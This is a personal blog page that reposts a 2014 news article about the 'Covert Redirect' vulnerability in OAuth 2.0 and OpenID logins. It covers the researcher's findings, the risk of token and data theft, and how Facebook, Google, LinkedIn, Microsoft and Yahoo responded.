注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

醉雨他乡游的博客

—— 记录生活中的点点滴滴, 开心与伤心, 回忆与憧憬, 成功与失败, 酸甜苦辣

 
 
 

日志

 
 

Nasty Covert Redirect Vulnerability found in OAuth and OpenID  

2014-10-02 15:59:20|  分类: News |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |



 

 

After Heartbleed bug, a security flaw in widely used open-source software OpenSSL that puts countless websites at risk, another vulnerability has been found in popular authentication software OpenID and authorization software OAuth.

 

Wang Jing, a Chinese mathematics Ph.D student at the Nanyang Technological University in Singapore, found that the OAuth and OpenID open source login tools are vulnerable to the "Covert Redirect" exploit.

 

The login tools ‘OAuth’ and ‘OpenID’ protocols are the commonly used open standard for authorization. OAuth designed as a way for users to sign in or sign up for other services using an existing identity of a site such as Google, Facebook, Microsoft or Twitter, whereas OpenID is a decentralized authentication system for the Internet that allows users to log in at websites across the internet with same digital identity.

 

 

 

The Covert Redirect vulnerability could affect those who use ‘OAuth’ and ‘OpenID’ protocols to ‘login’ to the websites such as Facebook, Google, Yahoo, LinkedIn, Microsoft, VK, Mail.Ru, PayPal, GitHub and many others. 

 

WHAT MAKES IT EVEN MORE DANGEROUS?

The "Covert Redirect" flaw masquerade as a login popup from the affected sites that could allow an attacker to steal personal data from users and redirect them to a website of the attacker's choice, which could potentially further compromise the victim.

 

By clicking on a malicious phishing link will get a popup window in Facebook, asking them to authorize the app and to hoax the user into giving up their information instead on legitimate websites, the Covert Redirect flaw uses the real site address for authentication. 

 

Once the user login, the attacker could get the personal data, which in the case of Facebook, could include the email address, birth date, contacts, work history, etc.

 

But, if in case “the token” has greater privilege, the attacker could obtain more sensitive information including the mailbox, friends list, online presence and most possibly even operate and control the user’s account.


In a blog post yesterday Jing explained, for OAuth 2.0, the attacks could risk “the token” of the site users and whenever users authorize the login the attacker could then use that to access users’ private information. In case of OpenID, the attacker could get users’ information directly, as it’s immediately transferred from the provider upon request.

 

However, this isn't the first time the issue has been raised and  the root cause is a lack of token whitelisting in OAuth 2.0.



 

RESPONSE FROM INTERNET GIANTS 

Facebook uses OAuth and something similar to OpenID. When he reported the Facebook about the vulnerability, Facebook said “they understand the risks associated with OAuth 2.0. However, short of forcing every single application on the platform to use a whitelist, [fixing the vulnerability] isn't something that can be accomplished in the short term.

 

Facebook isn't the only site affected, Jing reported the vulnerability to some more companies who use both OAuth and OpenID including Google, LinkedIn, Microsoft and Yahoo to discuss the problem.

 

Google uses OpenID and told Jing, “they are aware of the problem and are tracking it at the moment,” whereas LinkedIn told they have acknowledged the problem back in march and “published a blog post on how [they] intend to address [the problem].”

 

Microsoft replied after they investigated the matter and concluded that the vulnerability exists in the domain of a third-party which is different from the one Jing reported and recommended him to report the issue to the third-party instead.

 

Yahoo did not reply months after he reported.

They have little incentive to fix the problem,” Jing wrote regarding the companies, “One concern is the cost and the other is that in their view, the host company is responsible for making the attacks appear more credible; therefore, it is not solely their problem.

 





HOW TO FIX COVERT REDIRECT VULNERABILITY 

According to Jing, there is no speedy fix for the vulnerability. “In the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable,” Jing wrote.

 

Wang believes it's unlikely that this flaw will be patched any time soon. He says neither the authentication companies such as Google, Microsoft, Facebook, nor the client companies are taking responsibility for fixing the issue.

 

However, to take advantage of Covert redirect vulnerability, it requires interaction from users i.e. Victim has to click on a link or visit a malicious website, and then they have to click on a Facebook login button and agree to authorize the login and release of information.

 

So far, the security experts hasn't labelled this vulnerability as a major security flaw as Heartbleed, but still it’s a threat.

 

 

 

 


  评论这张
 
阅读(3)| 评论(1)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017